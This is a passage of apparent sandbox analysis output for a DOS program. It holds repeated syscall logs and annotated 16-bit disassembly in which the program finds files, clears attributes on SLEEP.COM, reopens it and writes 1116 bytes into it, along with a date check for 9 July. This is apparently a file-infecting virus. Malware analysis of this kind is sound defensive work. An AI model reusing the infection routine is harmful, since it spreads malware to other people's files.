0x12b98: add dx, word ptr [0x106]    ; pattern at 0x19f rebased by the word at [0x106] (presumably a load-offset delta - confirm); excerpt ends before the int 0x21
2018-12-25T12:30:44.995398601Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:45.000071431Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:44.955265002Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:44.958733254Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:44.963788599Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:44.965217409Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:44.972583178Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:44.980465042Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of INT 21h AH=2Ch (syscall op 44 = 0x2C): stores a clock-derived byte, then clears
; the target's attributes and reopens it read/write ahead of the writes logged after this excerpt.
2018-12-25T12:30:44.987591703Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh    ; Get time returns DH=seconds, DL=hundredths; dl = their 8-bit sum
0x12c84: je 0x12c7e    ; sum is zero: back 4 bytes, presumably re-issuing Get time
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]    ; si = 0x115 + word at [0x106] (presumably a load-offset delta - confirm)
0x12c8d: mov byte ptr [si], dl    ; NOTE(review): time-derived byte, consumer not shown; if it reaches the written body, infected copies will not hash alike
0x12c8f: mov ax, 0x4301    ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx    ; new attributes = 0 (read-only/hidden/system cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1    ; dx = path buffer at si+0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e    ; INT 21h AH=3Eh: close the handle in bx (presumably the one opened at PC 12c3d)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02    ; INT 21h AX=3D02h: open read/write; dx is not reloaded, so the same path
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e    ; carry set = open failed; target not shown
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax    ; store the returned handle at es:[dx+0x5d]
0x12cad: xchg ax, bx    ; bx = handle for the write
0x12cae: mov ah, 0x40    ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:30:44.990017036Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:46.030265846Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:46.033338816Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:46.041272337Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:46.04940815Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:46.052590253Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:46.055402383Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:46.057825159Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:46.173723991Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:46.175895128Z 62 PC: 12d05 | Close file
2018-12-25T12:30:46.317377751Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:46.477769888Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:46.481216011Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:46.489071566Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:46.497050746Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:46.498989267Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.64231477Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.64604122Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.654474957Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.658017369Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.662738976Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.666075064Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.668758155Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.687710739Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.689120875Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.702346487Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.722750431Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:46.725135149Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:46.731955138Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:46.737261624Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:46.739249975Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.753417619Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.755348569Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.769574238Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.776684861Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.779407768Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.782686892Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.78465252Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.820679151Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.823018223Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.856377202Z 67 PC: 12d16 | Get or set file attributes (See above)
; Code at the return address of INT 21h AH=2Ah (syscall op 42 = 0x2A). The viewer decodes linearly from
; that address, so 0x12b76-0x12b85 below should not be trusted as real instructions.
2018-12-25T12:30:46.886912732Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709    ; Get date returns DH=month, DL=day: tests for 9 July
0x12b6e: je 0x12b73    ; date matches -> trampoline at 0x12b73
0x12b70: jmp 0x12d88    ; no match; the chdir rows after this excerpt (PC 12d93, 12d9a) fit this path
0x12b73: jmp 0x12d1c    ; date-match path, target not shown; not exercised here (the job record below sets Day 1, Month 1)
0x12b76: and ah, bh    ; NOTE(review): follows an unconditional jmp and no branch in view targets it; likely data or a desynchronised decode
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl    ; assuming standard encodings, the bytes from 0x12b7f are 55 89 E5 83 EC 2C 56 = push bp / mov bp, sp / sub sp, 0x2c / push si
0x12b81: in ax, -0x7d    ; part of that misaligned prologue, presumably not a port read - confirm by re-decoding at 0x12b7f
0x12b83: in al, dx    ; same misaligned span
0x12b84: sub al, 0x56    ; same misaligned span
0x12b86: jmp 0x12bf8    ; decode is back in sync from here
0x12b89: mov ah, 0x1a    ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]    ; DTA = stack local at bp-0x2c
0x12b8e: int 0x21    ; no trace row in view returns at 12b90, so this call is not seen executing here
0x12b90: mov ah, 0x4e    ; INT 21h AH=4Eh: find first file
0x12b92: mov cx, 0x10    ; attribute mask 0x10 = directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]    ; pattern at 0x19f rebased by the word at [0x106] (presumably a load-offset delta - confirm); excerpt ends before the int 0x21
2018-12-25T12:30:46.890698055Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:46.896016526Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:45.262691905Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:45.26680358Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:45.271061953Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:45.2724345Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:45.278652605Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:45.285466367Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of INT 21h AH=2Ch (syscall op 44 = 0x2C): stores a clock-derived byte, then clears
; the target's attributes and reopens it read/write ahead of the writes logged after this excerpt.
2018-12-25T12:30:45.292574306Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh    ; Get time returns DH=seconds, DL=hundredths; dl = their 8-bit sum
0x12c84: je 0x12c7e    ; sum is zero: back 4 bytes, presumably re-issuing Get time
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]    ; si = 0x115 + word at [0x106] (presumably a load-offset delta - confirm)
0x12c8d: mov byte ptr [si], dl    ; NOTE(review): time-derived byte, consumer not shown; if it reaches the written body, infected copies will not hash alike
0x12c8f: mov ax, 0x4301    ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx    ; new attributes = 0 (read-only/hidden/system cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1    ; dx = path buffer at si+0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e    ; INT 21h AH=3Eh: close the handle in bx (presumably the one opened at PC 12c3d)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02    ; INT 21h AX=3D02h: open read/write; dx is not reloaded, so the same path
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e    ; carry set = open failed; target not shown
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax    ; store the returned handle at es:[dx+0x5d]
0x12cad: xchg ax, bx    ; bx = handle for the write
0x12cae: mov ah, 0x40    ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:30:45.294965308Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:45.311402687Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:45.313576224Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:45.334481973Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:45.338113778Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.357950052Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:45.360773137Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:45.363539754Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:45.372654006Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:45.374373746Z 62 PC: 12d05 | Close file
2018-12-25T12:30:45.382642954Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:45.392780337Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:45.395643439Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:45.402519748Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:45.409253574Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:45.411633756Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:45.643310265Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:45.645367122Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:45.652187893Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:45.655634982Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:45.670830258Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:45.673757457Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:45.676345605Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:45.899402654Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:45.901000619Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.093057787Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:46.1127111Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:46.115716477Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:46.122638876Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:46.12999994Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:46.132215476Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:46.152149726Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:46.155420247Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:46.162756953Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:46.169787958Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:46.174488934Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:46.177340383Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:46.179429537Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:46.19766892Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:46.199429202Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:46.221737822Z 67 PC: 12d16 | Get or set file attributes (See above)
; Code at the return address of INT 21h AH=2Ah (syscall op 42 = 0x2A). The viewer decodes linearly from
; that address, so 0x12b76-0x12b85 below should not be trusted as real instructions.
2018-12-25T12:30:46.242635238Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709    ; Get date returns DH=month, DL=day: tests for 9 July
0x12b6e: je 0x12b73    ; date matches -> trampoline at 0x12b73
0x12b70: jmp 0x12d88    ; no match; the chdir rows after this excerpt (PC 12d93, 12d9a) fit this path
0x12b73: jmp 0x12d1c    ; date-match path, target not shown; not exercised here (the job record below sets Day 1, Month 1)
0x12b76: and ah, bh    ; NOTE(review): follows an unconditional jmp and no branch in view targets it; likely data or a desynchronised decode
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl    ; assuming standard encodings, the bytes from 0x12b7f are 55 89 E5 83 EC 2C 56 = push bp / mov bp, sp / sub sp, 0x2c / push si
0x12b81: in ax, -0x7d    ; part of that misaligned prologue, presumably not a port read - confirm by re-decoding at 0x12b7f
0x12b83: in al, dx    ; same misaligned span
0x12b84: sub al, 0x56    ; same misaligned span
0x12b86: jmp 0x12bf8    ; decode is back in sync from here
0x12b89: mov ah, 0x1a    ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]    ; DTA = stack local at bp-0x2c
0x12b8e: int 0x21    ; no trace row in view returns at 12b90, so this call is not seen executing here
0x12b90: mov ah, 0x4e    ; INT 21h AH=4Eh: find first file
0x12b92: mov cx, 0x10    ; attribute mask 0x10 = directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]    ; pattern at 0x19f rebased by the word at [0x106] (presumably a load-offset delta - confirm); excerpt ends before the int 0x21
2018-12-25T12:30:46.245162285Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:46.249432306Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:46.936852239Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:46.940415825Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:46.944536505Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:46.945838967Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:46.957102117Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:46.964491528Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of INT 21h AH=2Ch (syscall op 44 = 0x2C): stores a clock-derived byte, then clears
; the target's attributes and reopens it read/write ahead of the writes logged after this excerpt.
2018-12-25T12:30:46.971113837Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh    ; Get time returns DH=seconds, DL=hundredths; dl = their 8-bit sum
0x12c84: je 0x12c7e    ; sum is zero: back 4 bytes, presumably re-issuing Get time
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]    ; si = 0x115 + word at [0x106] (presumably a load-offset delta - confirm)
0x12c8d: mov byte ptr [si], dl    ; NOTE(review): time-derived byte, consumer not shown; if it reaches the written body, infected copies will not hash alike
0x12c8f: mov ax, 0x4301    ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx    ; new attributes = 0 (read-only/hidden/system cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1    ; dx = path buffer at si+0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e    ; INT 21h AH=3Eh: close the handle in bx (presumably the one opened at PC 12c3d)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02    ; INT 21h AX=3D02h: open read/write; dx is not reloaded, so the same path
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e    ; carry set = open failed; target not shown
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax    ; store the returned handle at es:[dx+0x5d]
0x12cad: xchg ax, bx    ; bx = handle for the write
0x12cae: mov ah, 0x40    ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:30:46.97338722Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:46.989355669Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:46.991256873Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:46.997885691Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:47.001176447Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.003949604Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.0066838Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:47.009720607Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:47.018618913Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:47.020161675Z 62 PC: 12d05 | Close file
2018-12-25T12:30:47.028418606Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:47.038698666Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:47.041407283Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.04908558Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.056115931Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.058259077Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.068239952Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.070472288Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.077272456Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.080452364Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.084025834Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.086768341Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.088801454Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.099400689Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.101103494Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.113188339Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.123692373Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:47.126569535Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.133183655Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.140728974Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.142833104Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.152541306Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.157162277Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.169198304Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.176347072Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.179827128Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.182849399Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.184985129Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.1946025Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.196370201Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.204070431Z 67 PC: 12d16 | Get or set file attributes (See above)
; Code at the return address of INT 21h AH=2Ah (syscall op 42 = 0x2A). The viewer decodes linearly from
; that address, so 0x12b76-0x12b85 below should not be trusted as real instructions.
2018-12-25T12:30:47.213928546Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709    ; Get date returns DH=month, DL=day: tests for 9 July
0x12b6e: je 0x12b73    ; date matches -> trampoline at 0x12b73
0x12b70: jmp 0x12d88    ; no match; the chdir rows after this excerpt (PC 12d93, 12d9a) fit this path
0x12b73: jmp 0x12d1c    ; date-match path, target not shown; not exercised here (the job record below sets Day 1, Month 1)
0x12b76: and ah, bh    ; NOTE(review): follows an unconditional jmp and no branch in view targets it; likely data or a desynchronised decode
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl    ; assuming standard encodings, the bytes from 0x12b7f are 55 89 E5 83 EC 2C 56 = push bp / mov bp, sp / sub sp, 0x2c / push si
0x12b81: in ax, -0x7d    ; part of that misaligned prologue, presumably not a port read - confirm by re-decoding at 0x12b7f
0x12b83: in al, dx    ; same misaligned span
0x12b84: sub al, 0x56    ; same misaligned span
0x12b86: jmp 0x12bf8    ; decode is back in sync from here
0x12b89: mov ah, 0x1a    ; INT 21h AH=1Ah: set disk transfer address
0x12b8b: lea dx, word ptr [bp - 0x2c]    ; DTA = stack local at bp-0x2c
0x12b8e: int 0x21    ; no trace row in view returns at 12b90, so this call is not seen executing here
0x12b90: mov ah, 0x4e    ; INT 21h AH=4Eh: find first file
0x12b92: mov cx, 0x10    ; attribute mask 0x10 = directories
0x12b95: mov dx, 0x19f
0x12b98: add dx, word ptr [0x106]    ; pattern at 0x19f rebased by the word at [0x106] (presumably a load-offset delta - confirm); excerpt ends before the int 0x21
2018-12-25T12:30:47.217294054Z 59 PC: 12d93 | Change current directory
2018-12-25T12:30:47.22144749Z 59 PC: 12d9a | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":11460,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:30:47.13272124Z 71 PC: 12b44 | Get current directory
2018-12-25T12:30:47.135988482Z 59 PC: 12b4f | Change current directory
2018-12-25T12:30:47.139979774Z 26 PC: 12c03 | Set disk transfer address
2018-12-25T12:30:47.141218536Z 78 PC: 12c11 | Find first file
2018-12-25T12:30:47.156927174Z 61 PC: 12c3d | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:47.16345623Z 63 PC: 12c4f | Read file or device (Read 8 bytes on handle 5)
; Code at the return address of INT 21h AH=2Ch (syscall op 44 = 0x2C): stores a clock-derived byte, then clears
; the target's attributes and reopens it read/write ahead of the writes logged after this excerpt.
2018-12-25T12:30:47.170128663Z 44 PC: 12c82 | Get time 0x12c82: add dl, dh    ; Get time returns DH=seconds, DL=hundredths; dl = their 8-bit sum
0x12c84: je 0x12c7e    ; sum is zero: back 4 bytes, presumably re-issuing Get time
0x12c86: mov si, 0x115
0x12c89: add si, word ptr [0x106]    ; si = 0x115 + word at [0x106] (presumably a load-offset delta - confirm)
0x12c8d: mov byte ptr [si], dl    ; NOTE(review): time-derived byte, consumer not shown; if it reaches the written body, infected copies will not hash alike
0x12c8f: mov ax, 0x4301    ; INT 21h AX=4301h: set file attributes
0x12c92: xor cx, cx    ; new attributes = 0 (read-only/hidden/system cleared)
0x12c94: mov dx, si
0x12c96: add dx, 0xb1    ; dx = path buffer at si+0xb1
0x12c9a: int 0x21
0x12c9c: mov ah, 0x3e    ; INT 21h AH=3Eh: close the handle in bx (presumably the one opened at PC 12c3d)
0x12c9e: int 0x21
0x12ca0: mov ax, 0x3d02    ; INT 21h AX=3D02h: open read/write; dx is not reloaded, so the same path
0x12ca3: int 0x21
0x12ca5: jb 0x12c5e    ; carry set = open failed; target not shown
0x12ca7: mov di, dx
0x12ca9: add di, 0x5d
0x12cac: stosw word ptr es:[di], ax    ; store the returned handle at es:[dx+0x5d]
0x12cad: xchg ax, bx    ; bx = handle for the write
0x12cae: mov ah, 0x40    ; INT 21h AH=40h: write; excerpt ends before the int 0x21
2018-12-25T12:30:47.173073611Z 67 PC: 12c9c | Get or set file attributes
2018-12-25T12:30:47.189811908Z 62 PC: 12ca0 | Close file
2018-12-25T12:30:47.192076386Z 61 PC: 12ca5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:30:47.198893477Z 64 PC: 12cb8 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:30:47.202528082Z 64 PC: 12cca | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.205258757Z 64 PC: 12cdf | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:30:47.207888375Z 66 PC: 12ce8 | Move file pointer
2018-12-25T12:30:47.210574891Z 64 PC: 12a99 | Write file or device (Write 1116 bytes on handle 5)
2018-12-25T12:30:47.226056211Z 87 PC: 12d01 | Get or set file date and time
2018-12-25T12:30:47.227903655Z 62 PC: 12d05 | Close file
2018-12-25T12:30:47.23675536Z 67 PC: 12d16 | Get or set file attributes
2018-12-25T12:30:47.246747011Z 79 PC: 12c25 | Find next file
2018-12-25T12:30:47.249639309Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.257442345Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.264097084Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.266518352Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.277389129Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.281179608Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.296695192Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.303201159Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.319063488Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.321647451Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.323544556Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.333645697Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.338470646Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.351409119Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.359934639Z 79 PC: 12c25 | Find next file (See above)
2018-12-25T12:30:47.36283284Z 61 PC: 12c3d | Open file (See above)
2018-12-25T12:30:47.369549946Z 63 PC: 12c4f | Read file or device (See above)
2018-12-25T12:30:47.376700242Z 44 PC: 12c82 | Get time (See above)
2018-12-25T12:30:47.379128225Z 67 PC: 12c9c | Get or set file attributes (See above)
2018-12-25T12:30:47.389701917Z 62 PC: 12ca0 | Close file (See above)
2018-12-25T12:30:47.392318489Z 61 PC: 12ca5 | Open file (See above)
2018-12-25T12:30:47.399004108Z 64 PC: 12cb8 | Write file or device (See above)
2018-12-25T12:30:47.401966174Z 64 PC: 12cca | Write file or device (See above)
2018-12-25T12:30:47.405402943Z 64 PC: 12cdf | Write file or device (See above)
2018-12-25T12:30:47.408186097Z 66 PC: 12ce8 | Move file pointer (See above)
2018-12-25T12:30:47.410237559Z 64 PC: 12a99 | Write file or device (See above)
2018-12-25T12:30:47.420840599Z 87 PC: 12d01 | Get or set file date and time (See above)
2018-12-25T12:30:47.422680103Z 62 PC: 12d05 | Close file (See above)
2018-12-25T12:30:47.430387067Z 67 PC: 12d16 | Get or set file attributes (See above)
2018-12-25T12:30:47.441082181Z 42 PC: 12b6a | Get date 0x12b6a: cmp dx, 0x709
; Analyst notes on this excerpt (16-bit x86, syntax as emitted by the sandbox's disassembler).
; Execution resumes at 0x12b6a after INT 21h "Get date" (op 42 = AH 2Ah), which returns
; DH = month and DL = day, so the cmp on the row above tests DX == 0x0709, i.e. 9 July.
; The run-settings lines visible on this page all give 1 January 1980 and the trace goes on
; to 0x12d93/0x12d9a, which is consistent with the not-equal path; the code at 0x12d1c was
; not observed in these runs, so this trace says nothing about what the date branch does.
0x12b6e: je 0x12b73                               ; date matched -> trampoline at 0x12b73
0x12b70: jmp 0x12d88                              ; any other date: continue at 0x12d88 (not in this excerpt)
0x12b73: jmp 0x12d1c                              ; 9 July only: target not in this excerpt
; NOTE(review): 0x12b76-0x12b85 follows an unconditional jmp and was decoded by linear sweep.
; The first bytes are probably data and the listing looks one byte out of step: read from
; 0x12b7f, the same encodings give push bp / mov bp, sp / sub sp, 0x2c / push si, which
; matches the [bp - 0x2c] buffer used at 0x12b8b. Treat the next eight rows as unreliable.
0x12b76: and ah, bh
0x12b78: movsw word ptr es:[di], word ptr [si]
0x12b79: mov ax, 0x5c4c
0x12b7c: add word ptr [di], ax
0x12b7e: add byte ptr [di - 0x77], dl
